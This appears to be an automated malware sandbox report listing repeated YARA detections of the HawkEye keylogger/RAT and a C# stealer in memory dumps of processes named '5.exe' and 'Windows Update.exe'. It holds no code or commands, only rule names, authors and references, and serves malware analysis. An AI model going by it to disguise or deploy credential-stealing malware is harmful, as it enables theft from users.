          Source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.290a338.44.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.290a338.21.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.290a338.5.raw.unpack, type: UNPACKEDPE, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000002.391527665.00000000075C0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000000.357304833.00000000075C0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.350262579.00000000075C0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.350302983.0000000007610000.00000004.00020000.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.391554115.0000000007610000.00000004.00020000.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORY, Matched rule: RAT_HawkEye, date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer, date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Hawkeye, author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
